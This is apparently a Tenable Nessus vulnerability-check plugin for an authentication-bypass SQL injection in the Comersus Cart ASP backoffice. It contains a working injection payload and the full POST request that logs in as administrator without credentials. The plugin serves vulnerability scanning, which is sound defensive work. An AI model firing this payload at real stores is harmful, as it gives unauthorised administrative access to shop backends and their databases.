#
# (C) Tenable Network Security
#


  desc = "
Synopsis :

The remote web server contains an ASP application that is prone to a
SQL injection attack. 

Description :

The remote host appears to be running Comersus Cart, an ASP shopping
cart application. 

The version of Comersus Cart installed on the remote host fails to
sanitize input to the 'adminName' and 'adminpassword' fields of the
'backofficeLite/comersus_backoffice_menu.asp' script before using them
in a database query.  An unauthenticated remote attacker can leverage
this issue to bypass authentication and gain administrative access to
the application or launch other attacks against the affected
application and its underlying database. 

See also :

http://www.morx.org/comersus.txt

Solution :

Unknown at this time. 

Risk factor : 

High / CVSS Base Score : 7.5
(CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P)";


if (description) {
  script_id(20131);
  script_version("$Revision: 1.6 $");

  script_bugtraq_id(15251);

  script_name(english:"Comersus BackOffice Administrator Authentication Bypass Vulnerability");
  script_summary(english:"Checks for administrator authentication bypass vulnerability in Comersus BackOffice");
 
  script_description(english:desc);
 
  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");
 
  script_copyright(english:"This script is Copyright (C) 2005-2007 Tenable Network Security");

  script_dependencies("http_version.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}


include("global_settings.inc");
include("http_func.inc");
include("http_keepalive.inc");


port = get_http_port(default:80);
if (!get_port_state(port)) exit(0);
if (!can_host_asp(port:port)) exit(0);


# Loop through directories.
if (thorough_tests) dirs = make_list("/comersus", "/store", "/shop", cgi_dirs());
else dirs = make_list(cgi_dirs());

foreach dir (dirs) {
  foreach prod (make_list("backofficeLite", "backofficePlus")) {
    # Check whether the script exists.
    req = http_get(item:string(dir, "/", prod, "/comersus_backoffice_index.asp"), port:port);
    res = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);
    if (res == NULL) exit(0);

    # Get the session cookie.
    pat = "Set-Cookie: (ASPSESSIONID[^=]+)=([^; ]+)";
    matches = egrep(pattern:pat, string:res);
    if (matches) {
      foreach match (split(matches)) {
        match = chomp(match);
        cookie = eregmatch(pattern:pat, string:match);
        if (cookie == NULL) break;
        cookie = string(cookie[1], "=", cookie[2]);
        break;
      }
    }

    # If we have a session cookie...
    if (strlen(cookie)) {
      # Try to exploit the flaw.
      exploit = "%27+OR+adminpassword+%3C%3E+%27%27+OR+adminpassword+%3D+%27";
      postdata = string(
        "adminName=", exploit, "&",
        "adminpassword=", exploit, "&",
        "Submit2=Login"
      );
      req = string(
        "POST ", dir, "/backofficeLite/comersus_backoffice_menu.asp HTTP/1.1\r\n",
        "Host: ", get_host_name(), "\r\n",
        "Cookie: ", cookie, "\r\n",
        "Content-Type: application/x-www-form-urlencoded\r\n",
        "Content-Length: ", strlen(postdata), "\r\n",
        "\r\n",
        postdata
      );
      res = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);
      if (res == NULL) exit(0);

      # There's a problem if it looks like we're getting in.
      if (egrep(pattern:"^Location: +comersus_backoffice_menu.asp?lastLogin=", string:res)) {
        security_hole(port);
        exit(0);
      }
    }
  }
}
